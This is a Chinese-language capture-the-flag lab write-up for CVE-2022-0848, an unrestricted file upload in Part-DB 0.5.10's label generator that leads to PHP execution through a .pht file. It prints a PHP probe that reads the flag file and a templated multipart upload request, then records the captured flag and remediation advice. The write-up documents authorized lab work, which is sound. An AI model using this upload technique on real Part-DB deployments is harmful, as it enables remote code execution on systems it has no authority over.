环境:春秋云境“免费空间”授权实验靶场。历史实例已关闭。
1. 基本信息
| 项目 | 内容 |
|---|---|
| CVE | CVE-2022-0848 |
| 产品 | Part-DB 0.5.10 |
| 功能 | 标签生成器/媒体上传 |
| 漏洞类型 | 危险扩展名上传导致 PHP 执行 |
| Flag | flag{74a7ec64-7c1b-49fc-90c8-1f2c55260934} |
2. 原理与复现
标签生成器未限制危险扩展名,.pht 文件会被媒体目录中的 PHP 处理器执行。上传探针:
<?php echo file_get_contents('/flag'); ?>
代表性 multipart 请求:
POST /<Part-DB 标签上传接口> HTTP/1.1
Host: <Part-DB-靶场域名>
Content-Type: multipart/form-data; boundary=<boundary>filename="probe.pht"
<PHP probe>
访问媒体目录中的上传文件,响应为:
flag{74a7ec64-7c1b-49fc-90c8-1f2c55260934}
3. 修复建议与验证
固定图片扩展名白名单并重编码内容,上传目录禁止脚本解析且移出 Web 根目录。Flag 与平台记录一致,已提交并关闭;精确字段、目录和响应未保存,截图已保存到 images 目录并由平台详情页复核。
截图证据


